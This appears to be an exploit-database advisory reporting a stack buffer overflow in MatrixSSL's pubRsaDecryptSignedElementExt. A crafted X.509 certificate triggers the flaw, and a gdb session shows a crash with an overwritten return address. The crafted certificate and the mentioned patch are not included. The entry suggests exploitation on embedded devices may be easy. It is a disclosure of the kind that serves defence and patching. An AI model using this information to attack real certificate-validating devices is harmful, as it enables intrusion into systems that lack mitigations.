Exploits / Vulnerability Discovered : 2019-02-20 |
Type : dos |
Platform : linux
[+] Code ...
I happened to notice that a public X.509 certificate testcase for CVE-2014-1569 caused a stack buffer overflow in MatrixSSL.
I cleaned up the testcase a bit, to make a better demonstration. You can test it with the certValidate tool that comes with MatrixSSL.
$ gdb -q --args matrixssl/matrixssl/test/certValidate stackbufferoverflow.pem
Reading symbols from matrixssl/matrixssl/test/certValidate...done.
(gdb) r
Starting program: matrixssl/matrixssl/test/certValidate stackbufferoverflow.pem
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Loaded chain file stackbufferoverflow.pem
[0]:berserk.filippo.io
[1]:(null)
WARN subject not provided, SUBJ validation will be skipped
Program received signal SIGSEGV, Segmentation fault.
0x00005555555c5164 in pubRsaDecryptSignedElementExt
(gdb) bt
#0 0x00005555555c5164 in pubRsaDecryptSignedElementExt
#1 0x4141414141414141 in ?? ()
#2 0x0000000000000000 in ?? ()
I believe any client or server that validates certificates will be affected by this, and as MatrixSSL is usually used in embedded devices where mitigations are usually not quite as thorough as modern distributions, exploitation might not be difficult.
The bug is that pubRsaDecryptSignedElementExt() uses a fixed size stack buffer, but then doesn't check if the key size exceeds it. The patch below should solve it.